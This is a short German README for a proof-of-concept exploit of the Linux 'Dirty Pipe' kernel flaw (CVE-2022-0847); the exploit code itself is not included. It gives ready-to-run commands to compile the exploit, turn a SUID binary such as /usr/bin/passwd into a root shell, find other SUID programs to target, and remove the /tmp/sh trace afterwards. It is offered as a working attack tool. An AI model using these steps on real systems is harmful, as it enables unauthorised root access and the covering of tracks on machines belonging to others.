
Proof-of-Concept-Exploit für CVE-2022-0847 (Dirty Pipe), der lokale Privilegieneskalation durch Manipulation von SUID-Binärdateien auf Linux-Kerneln ermöglicht.
Kompilieren
Unter Linux das POC-Programm mit gcc -o dirty dirty.c kompilieren
Verwendung
Das Programm mit ./dirty SUID ausführen. Dabei ist SUID der Pfad zu einem Programm mit SUID-Bit.
In der Regel kann /usr/bin/passwd verwendet werden, also ./dirty /usr/bin/passwd ausführen.

Man erhält eine Root-Shell.
Mit find / -perm /4000 können Programme mit SUID-Bit gefunden werden.


Vergiss nicht, /tmp/sh zu löschen.
